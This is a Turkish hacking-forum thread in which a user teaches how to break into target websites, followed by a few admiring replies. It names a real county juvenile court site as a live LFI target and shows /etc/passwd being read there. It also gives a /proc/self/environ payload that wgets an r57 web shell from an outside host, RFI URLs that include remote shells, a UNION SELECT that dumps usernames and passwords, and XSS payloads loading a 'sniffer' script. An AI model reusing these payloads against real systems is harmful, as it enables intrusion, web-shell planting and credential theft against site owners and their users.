Status
Not open for further replies.
I

Isko~

Merhaba Spy Ailesi

Bugun sizlere hedef site nasil hacklenir, nasil acik aranir, nasil analiz edilir hepsini anlatmaya calisagim. Ilk önce hedef sitemizi secip bilgi toplamamiz lazim
Bilgi den kastim ; whois, sunucu tarama, sitenin scripti, Sunucu daki baska siteden hedef’e dalma, Acik arama ve shell sokmak.

Whois
Who.is sitesine girip, whois cekebilirsin boylece site hanki hosta barindigini, kime ait oldugunu ögrenebiliriz.

Site : http://www.who.is

kBBo2v.jpg


Sunucu tarama
Sunucu tarama bize hedef sitede acik bulamazsak eger, sunucudan bir sitenin acigindan yararlarak servere girmemizi saglariz, boylece istedigimiz hedefe ulasabilirsiniz.
Sunucu taramasi nasil yapilir ?
Bunun icin lookup siteleri vardir veya PHP ile kodlanmis scriptler veya Toolar mevcuttur.
Tool(rar icinde mevcuttur)

NAAPyk.jpg



Sitenin scripti nedir ? Hanki script kullaniliyor? Nasil anlarim ?

Ilk once url de en önemli kisma bakmamiz lazim, Aceba Sitenin dosya uzantilari nedir ? .php , .asp, .aspx Boylece ilk goruste sitenin yazilim dilini ogreniriz. [PHP ile kodlanmis, veya asp, veya aspx…]
Bazi insanlar siteye girdiginde direk anlar site hanki script kurulu oldugunu..(hack deneyimden kaynaklaniyordur illaki)
Simdi diyelim arayuzu tanimadik ilk once Footer bakariz eger footer da Powered by Wordpress yazarsa, veya Powered by Joomla, Powered by Seditio, vs Powered by xxx sitenin scripti’dir.

a33W4d.jpg



Eger footer’da herhangi gibi birsey powered by xxx yazmazsa, kaynak kodunu goruntuleriz.
Kaynak kodlarindan sitenin scriptini nasil anlarim ?
Wordpress de -> www.hedefsite.com/wp-content/images/uploads/isko.jpg
Gibi wp-contents wordpress ‘in dosya yollarindan biridir… yani sitenin wordpress oldugu anlarim (burdaki olay wordpress’in dosyalarini tanimaniz lazim veya diger scriptlerin... )
Olay eger joomla deilse, wordpress deilse cotonti, seditio deilse baska hanki scriptler var diye aklinizda soru isareti varsa, bunu tek cozumu kaynak kodlarindan /dosyayolu/dosyayolu/
su kisimlari kopyalayip google e yapisitirip aratmaniz lazim. Böylece indexlenmis olan dosya yolari size scriptin ismini daha cabuk bulmanizda fayda edecektir ve boylelikle hemen exploit aramanizi hizlandirmis olacaksiniz.

Hedef sitemizin whois cektik, Sunucudaki siteleri cektik, Sitenin hanki script oldugunu ogrendik sira geldi sitenin acigini aramaya.

Hedef sitede acik nasil ararim ?

Hedef sitede acigi scriptine gore arariz, yazilim diline, kodlarina gore arama yapariz.

Örnek veriyorum ;: wordpress tabanli bir sitemiz var , o wordpress surumune gore exploitlara bakarim, kaynak kodlarinda eklentiler bile cikar, o eklentilere gore exploit ararim , exploit kullanimi zor deildir.
Aynisi joomla, seditio, cotonti gibi scriptlere de gecerlidir.

exploit nasil ararim ?

Wordpress.com/plugins/exploitsiolanplug/xskod/..

Burdaki olay exploitsiolanplug nine gore exploit aramak

Google => exploitsiolanplug exploit
Google => inurl: exploitsiolanplug exploit

Böylece size kullanmis oldugu pluginlerin exploitleri mevcutmu deilmi diye aramanizi saglar.
Unutmayin sadece pluginde acik yoktur,

Yöntemler :

Upload acigi olabilir

SQL injection acigi

RFI acigi

Lfi acigi


Admin yolunu bulup sifre kirma olabilir bunlar hepsi sitede acik arama kategorisine girer.

//

Örnekler

LFI Acigi

LFI acigi olusturmasi


index.php dosyası:

Code:
<?php
include($_GET['sayfa'])
?>

index.php?sayfa=../../../../../../../../../etc/passwd


Ornek :

Sitesi : http://www.belmontcountyjuvenilecourt.com/index2.php

X-Bug Browser by isko tool ile sana url de girmen gerekenleri secip bug basman yeterli olcaktir, toolsuzda olur tabi

Komutlar basit

http://www.belmontcountyjuvenilecourt.com/index2.php?topic=../../etc/passwd

Code:
Warning: include(includes/../../etc/passwd) [function.include]: failed to open stream: No such file or directory in/home/costinejuv/www/index2.php on line64

Diye hata aldik

Devam ediyoruz


http://www.belmontcountyjuvenilecourt.com/index2.php?topic=../../../etc/passwd

Yine ayni hatayi aldik

Devam ediyoruz

http://www.belmontcountyjuvenilecourt.com/index2.php?topic=../../../../etc/passwd

Ve passwd listesi geldi


Ykk01D.jpg


Bukadar basit arkadaslar…

Burda onemli olan lfi acigindan shell yuklemeniz ve daha kolay hacklemeniz olcaktir

Kodumuz

proc/self/environ%00&cmd=wgethttps://shelladresi.com/r57.txt-Oshell.php

olarak girip shelli yuklememiz lazim (unutmayin bu her lfi de yaramayabilir verdigim ornek sitede yaramadi.)


Devami...
 

Attachments

  • 4.zip
    1,004 bytes · Views: 186
  • 2.zip
    231.7 KB · Views: 206
  • 3.zip
    139.8 KB · Views: 183
I

Isko~

RFI acigi kullanimi

http://www.adaminblogsitesi.com/hakkimda.php?url=http://www.shelladresi.com/r57.txt bazen
txt? Olarak yaparsanizda sonuc alabilirsiniz. Veya ?? veya 3-4-5-6-7-8-9 x ...

http://www.adaminblogsitesi.com/hakkimda.php?url=http://www.shelladresi.com/r57.txt?
http://www.adaminblogsitesi.com/hakkimda.php?url=http://www.shelladresi.com/r57.txt ??
http://www.adaminblogsitesi.com/hakkimda.php?url=http://www.shelladresi.com/r57.txt ???
http://www.adaminblogsitesi.com/hakkimda.php?url=http://www.shelladresi.com/r57.txt ???? ve boyle devam eder

Rfi acigi Remote file inclusion, Yani uzaktan dosya cagirmadir, uzaktan shellimizi cagircagiz, url son kismina shell adresimi yaziyorum (TXT) olarak bunu google ; r57.txt olarak aratirsaniz bulursunuz.

Blog’un hakimmda.php kodlarinda include kodu kullaniyorsa yuksek ihtimal remote file inclusion yani dosya cagirma islemi gerceklestirebiliriz.

Rfi nin olustugu kod hatasi

include(“$hakkimda/guncel/hakkimda.php”);

Bu satirdaki “$” isareti bulunan paramtreden dogan hata kodu ile uzaktan dosya cagirmak mumkundur.

http://www.hedef.com/index.php?hakkimda=http://shellsitesi.com/shell.txt?

yaparak shellimizi cagirabiliriz.

Upload acigi

http://www.adaminblogsitesi.com/upload.php veya /upload/upload.php veya blog’un her han gibi bir klasörde upload acigi mevcut ise shellimizi yukleriz.
Her site .php uzantisini uygun gormez onun icin bazi shellerimizi shell.gif;.php yapariz.

SQL acigi

http://www.adaminblogsitesi.com/hakkimda.php?url=’

url=tirnak isareti koyarak sayfada sql hatasi vermeye calisiriz

Bazi sitelerde sql hatalarini verir, bazi sitelerde bos beyaz sayfa hatasi alirsiniz egerki boyle birsey ile karsilasirsaniz eger hata yoktur demeyin J deneyin zorlayin

Uyeler.php klasorumuz

Code:
<?php

$baglan = mysql_pconnect("localhost","root","spyspy");    / veritabanına bağlanıyoruz
$baglan = mysql_select_db("sqli",$baglan);    / oluşturduğumuz veritabanımızı seçiyoruz

$id = $_GET["id"];
$sorgula = "SELECT * FROM uye WHERE id=".$id;
$cek = mysql_fetch_object(mysql_query($sorgula));

echo 'Olusan Sorgu: '.$sorgula."<br>";
echo $cek->username."<br>".$cek->email;

?>

id= query stringin filtrelenmeden dinamik sql sorgusuyla birlestirilmistir

http://www.adaminblogsitesi.com/uyeler.php?id=’1

diyerek sql hatasi almamizi saglar.

8ZZBGd.jpg


http://www.adaminblogsitesi.com/uyeler.php?id=-1+UNION+SELECT+1,CONTACT(id,0x3a,username,password)+,4,+FROM+uye

D22ZLy.jpg


Gordgunuz gibi user pass aldik

XSS acigi

Xss icin fazla sizlere bilgi vermicem fakat birkac ornek verebilirim …

Açıklı parametre GET(id=1 gibi) metodu ile alınıyorsa;
http://site.com/index.php?ara=<script src=http://sniffersitemiz.com/a></script>

Bazı Alert Kodları

')alert('xss');
;alert('xss');
<script>alert(123)</script>
<script type=text/javascript>alert("spy")</script> <script>alert("tht");</script>
<script>alert("spy"/)</script>
<script>var deger=1;alert("spy")</script>

Bypass filtreleme ozellik kodlari

<***** type=text/javascript>alert("Spyhackerz")</*****>
<*****>alert("Spyhackerz")</*****>;
<*****>alert("Spyhackerz ");</*****>
<*****>alert("Spyhackerz "/)</*****>
<*****>var var = 1; alert(var)</*****>


Admin panel password crack

Burda sizin kisisel zekaniz devreye girmesi lazim cunku admin password bulmasi okdr basit deildir…

Fakat bazi PHP tooler mevcut bruteforcer vs…

Kendim icin kodlamis oldugum basit uyduruk bisi var elimde ise yariyor ama …

d33yjZ.jpg


Evet arkadaslar Gördugunuz gibi hedef sitede farkli farkli yontemler denedik, RFI LFI upload, Admin hack ..

Simdi diyelimki Hicbiri Ise yaramadi Ozaman (2.) Sunucudaki siteleri versiyon scanner ile taramak olcak. Sunucudaki sitelerin scriptlerine gore tarama yapar ve size site x su scripti kullaniyor diye cevap verir, boylece size tek tek hanki script oldugungan zaman kazandirir

E88o7D.jpg



j33ZEg.jpg


Evet bize seditio bulundu dedi (toolu ozellestirdim daha etkili hale getircim, birazcik kendiniz hayal gucunuzu , zekanizi kullanip degisik seyler cikarabilirsiniz.)

Seditio Exploitlerini aramaya basliyabiliriz ve sitede uygulamaya baslariz…

SON OLARAKDA Sosyal muhendisligi deniyebilirsiniz … Buda sizin nomisizliginize kalmmis bisi :D

Admin Panel Finder burda (dosya boyutu yuksek)

Spyhackerz.com

Isko
 
Last edited by a moderator:
Joined
Apr 4, 2016
Credits
0
Rating - 0%
Çok iyi paylaşımlar bilgilendirmede güzel çok teşekkürler eline sağlık
 
Joined
Mar 30, 2016
Credits
0
Rating - 0%
bu kadar kolay olsa keşke yıllardır denıyorum bu yontemlerı hedeflerımde iş yapmıyor bunun dışında başka önemli birşeyler var yoksa piyasada okadar hack team forumu yada onemlı siteler hacklenmez
 

x43

Joined
Jan 22, 2017
Credits
114
Rating - 0%
Çok sade ve anlaşılır bir dokuman, kitaplarda yazanlara nazaran. Çok beğendim, eline emeğine saklık isko.
 
Status
Not open for further replies.

Users who are viewing this thread

Top